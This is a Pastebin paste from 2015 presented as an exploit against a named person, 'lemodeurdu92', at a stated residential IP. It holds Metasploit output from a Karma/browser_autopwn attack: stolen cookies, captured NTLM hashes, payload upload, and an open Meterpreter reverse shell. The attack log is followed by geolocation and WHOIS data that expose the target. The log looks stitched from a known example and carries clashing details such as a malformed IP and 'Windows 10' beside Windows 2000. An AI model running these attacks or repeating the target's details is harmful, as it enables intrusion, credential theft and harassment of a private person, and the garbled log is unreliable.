API tools faq
paste
Advertisement
Guest User

Exploit | lemodeurdu92 By Fame (non terminé)

a guest
Oct 20th, 2015
204
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.36 KB | None | 0 0
raw download clone embed print report
  1. == == ==== =============================
  2. = = = = = = =========================
  3. = = = = = = = =
  4. = = = = = = = ===========================
  5. = = = = = = ========================== =
  6. = = = = = = = =
  7. = = = = = = = =
  8. = = = = = ====================== =
  9. ==== == == ===== ===========================
  10.  
  11. Exploit lemodeurdu92 / 81.56.17.144 By Fame with metasploit
  12.  
  13.  
  14. root@kalifame:~# msfconsole -r karma.rc
  15.  
  16. _
  17. | | o
  18. _ _ _ _ _|_ __, , _ | | __ _|_
  19. / |/ |/ | |/ | / | / _|/ _|/ / _| |
  20. | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
  21. /|
  22. |
  23.  
  24.  
  25. =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
  26. + -- --=[ 2 exploits - 46 payloads
  27. + -- --=[ 12 encoders - 3 nops
  28. =[ 49 aux
  29.  
  30. resource> load db_JtebaiseMrJeuxMod
  31. [-]
  32. [-] The functionality previously provided by this plugin has been
  33. [-] integrated into the core command set. Use the new 'db_driver'
  34. [-] command to use a database driver other than sqlite3 (which
  35. [-] is now the default). All of the old commands are the same.
  36. [-]
  37. [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
  38. resource> db_create /root/Jtebaisefame#never.db
  39. [*] Creating a new database instance...
  40. [*] Successfully connected to the database
  41. [*] File: /root/Jtebaisefame#never.db
  42. resource> use auxiliary/server/browser_autopwn
  43. resource> setg AUTOPWN_HOST 10.0.0.1
  44. AUTOPWN_HOST => 10.0.0.1
  45. resource> setg AUTOPWN_PORT 55550
  46. AUTOPWN_PORT => 55550
  47. resource> setg AUTOPWN_URI /ads
  48. AUTOPWN_URI => /ads
  49. resource> set LHOST 10.0.0.1
  50. ...snip...
  51. [*] Using URL: http://0.0.0.0:55550/hzr8QG95C
  52. [*] Local IP: http://92.155.192.243.9953/hzr8QG95C
  53. [*] Server started.
  54. [*] Handler binding to LHOST 0.0.0.0
  55. [*] Started reverse handler
  56. [*] Server started.
  57. [*] Handler binding to LHOST 0.0.0.0
  58. [*] Started reverse handler
  59. [*] Server started.
  60.  
  61. msf auxiliary(http) >
  62.  
  63. msf auxiliary(http) >
  64. [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
  65. [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
  66. [*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3; MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage; hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
  67. [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
  68. [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
  69. [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
  70. [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
  71. ...snip...
  72. [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
  73. [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
  74. [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
  75. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  76. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  77. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  78. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  79. [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
  80. [*] Request '/ads' from 10.0.0.100:1278
  81. [*] Recording detection from User-Agent
  82. [*] DNS 10.0.0.100:1292 XID 96 (IN:Fameofficiel@gmail.com:A gmail.google.com)
  83. [*] Browser claims to be MSIE 5.01, running on Windows 2000
  84. [*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
  85. [*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby/1.8/sqlite3
  86. ...snip...
  87. [*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
  88. [*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
  89. [*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
  90. [*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
  91. [*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
  92. [*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
  93. [*] HTTP REQUEST 10.0.0.100 > linkedin.com:80 GET /forms.html Windows IE 5.01 cookies=
  94. [*] HTTP REQUEST 10.0.0.100 > livejournal.com:80 GET /forms.html Windows IE 5.01 cookies=
  95. [*] HTTP REQUEST 10.0.0.100 > monster.com:80 GET /forms.html Windows IE 5.01 cookies=
  96. [*] HTTP REQUEST 10.0.0.100 > myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
  97. [*] HTTP REQUEST 10.0.0.100 > plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
  98. [*] HTTP REQUEST 10.0.0.100 > ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
  99. [*] Sending MS03-020 Internet Explorer Object Type to 10.0.0.100:1278...
  100. [*] HTTP REQUEST 10.0.0.100 > slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
  101. [*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 10 LM:Windows 10
  102. ...snip...
  103. [*] HTTP REQUEST 10.0.0.100 > www.monster.com:80 GET /forms.html Windows IE 5.01 cookies=
  104. [*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
  105. [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
  106. [*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
  107. [*] AUTHENTICATED as TARGETP0WN3D...
  108. [*] Connecting to the ADMIN$ share...
  109. [*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
  110. [*] Regenerating the payload...
  111. [*] Uploading payload...
  112. [*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
  113. [*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
  114. [*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
  115. [*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
  116. [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
  117. [*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
  118. [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
  119. [*] Created UxsjordQ.exe...
  120. [*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
  121. [*] Connecting to the Service Control Manager...
  122. [*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
  123. [*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
  124. [*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
  125. [*] Obtaining a service manager handle...
  126. [*] Creating a new service...
  127. [*] Closing service handle...
  128. [*] Opening service...
  129. [*] Starting the service...
  130. [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
  131. [*] Removing the service...
  132. [*] Closing service handle...
  133. [*] Deleting UxsjordQ.exe...
  134. [*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
  135. [*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 10 2195 LM:Windows 10 5.0
  136. [*] Sending Access Denied to 10.0.0.100:1362
  137. [*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
  138. [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
  139. [*] AUTHENTICATED as TARGETP0WN3D...
  140. [*] Ignoring request from 10.0.0.100, attack already in progress.
  141. [*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
  142. [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
  143. [*] Sending stage (2650 bytes)
  144. [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
  145. [*] HTTP REQUEST 10.0.0.100 > www.youtube.com:80 GET / Windows IE 5.01 cookies=
  146. [*] Sleeping before handling stage...
  147. [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
  148. [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
  149. [*] Uploading DLL (75787 bytes)...
  150. [*] Upload completed.
  151. [*] Migrating to lsass.exe...
  152. [*] Current server process: rundll32.exe (848)
  153. [*] New server process: lsass.exe (232)
  154. [*] Meterpreter session 1 opened (10.0.0.1:45017 -> 92.155.192.243.9953)
  155.  
  156. msf auxiliary(http) > sessions -l
  157.  
  158. Active sessions
  159. ===============
  160.  
  161. Id Description Tunnel
  162. -- ----------- ------
  163. 1 Meterpreter 10.0.0.1:45017 -> 92.155.192.243.9953 ESTABLISHED
  164. 81.56.17.144
  165. [IP Blacklist Check]
  166. Reverse DNS: 144.17.56.81.in-addr.arpa
  167. Hostname: lon92-2-81-56-17-144.fbx.proxad.net
  168. Nameservers:
  169. ns1.proxad.net >> 212.27.32.130
  170. ns0.proxad.net >> 212.27.32.2
  171. IP Lookup Location For IP Address: 81.56.17.144
  172. Continent: Europe (EU)
  173. Country: France (FR)
  174. Capital: Paris
  175. State: Ile-de-France
  176. City Location: Suresnes
  177. Postal: 92150
  178. ISP: Free SAS
  179. Organization: Free SAS
  180. AS Number: AS12322 Free SAS
  181. something went wrong!
  182.  
  183. something went wrong!
  184.  
  185. Time Zone: Europe/Paris
  186. Local Time: 20:18:48
  187. Timezone GMT offset: 7200
  188. Sunrise / Sunset: 08:19 / 18:51
  189. Extra IP Lookup Finder Info for IP Address: 81.56.17.144
  190. Continent Lat/Lon: 48.69083 / 9.1405
  191. Country Lat/Lon: 46 / 2
  192. City Lat/Lon: (48.8714) / (2.2293)
  193. IP Language: French
  194. IP Address Speed: Broadband (Cable/DSL) Internet Speed
  195. [ Check Internet Speed]
  196. IP Currency: Euro, CFP Franc
  197. IDD Code: +33
  198. #
  199. # ARIN WHOIS data and services are subject to the Terms of Use
  200. # available at: https://www.arin.net/whois_tou.html
  201. #
  202. # If you see inaccuracies in the results, please report at
  203. # http://www.arin.net/public/whoisinaccuracy/index.xhtml
  204. #
  205.  
  206.  
  207. #
  208. # Query terms are ambiguous. The query is assumed to be:
  209. # "n 81.56.17.144"
  210. #
  211. # Use "?" to get help.
  212. #
  213.  
  214. #
  215. # The following results may also be obtained via:
  216. # http://whois.arin.net/rest/nets;q=81.56.17.144?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2
  217. #
  218.  
  219. NetRange: 81.0.0.0 - 81.255.255.255
  220. CIDR: 81.0.0.0/8
  221. NetName: 81-RIPE
  222. NetHandle: NET-81-0-0-0-1
  223. Parent: ()
  224. NetType: Allocated to RIPE NCC
  225. OriginAS:
  226. Organization: RIPE Network Coordination Centre (RIPE)
  227. RegDate:
  228. Updated: 2009-03-25
  229. Comment: These addresses have been further assigned to users in
  230. Comment: the RIPE NCC region. Contact information can be found in
  231. Comment: the RIPE database at http://www.ripe.net/whois
  232. Ref: http://whois.arin.net/rest/net/NET-81-0-0-0-1
  233.  
  234. ResourceLink: https://apps.db.ripe.net/search/query.html
  235. ResourceLink: whois.ripe.net
  236.  
  237. OrgName: RIPE Network Coordination Centre
  238. OrgId: RIPE
  239. Address: P.O. Box 10096
  240. City: Amsterdam
  241. StateProv:
  242. PostalCode: 1001EB
  243. Country: NL
  244. RegDate:
  245. Updated: 2013-07-29
  246. Ref: http://whois.arin.net/rest/org/RIPE
  247.  
  248. ReferralServer: whois://whois.ripe.net
  249. ResourceLink: https://apps.db.ripe.net/search/query.html
  250.  
  251. OrgTechHandle: RNO29-ARIN
  252. OrgTechName: RIPE NCC Operations
  253. OrgTechPhone: +31 20 535 4444
  254. OrgTechEmail: hostmaster@ripe.net
  255. OrgTechRef: http://whois.arin.net/rest/poc/RNO29-ARIN
  256.  
  257. OrgAbuseHandle: ABUSE3850-ARIN
  258. OrgAbuseName: Abuse Contact
  259. OrgAbusePhone: +31205354444
  260. OrgAbuseEmail: abuse@ripe.net
  261. OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE3850-ARIN
  262.  
  263.  
  264. #
  265. # ARIN WHOIS data and services are subject to the Terms of Use
  266. # available at: https://www.arin.net/whois_tou.html
  267. #
  268. # If you see inaccuracies in the results, please report at
  269. # http://www.arin.net/public/whoisinaccuracy/index.xhtml
  270. #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!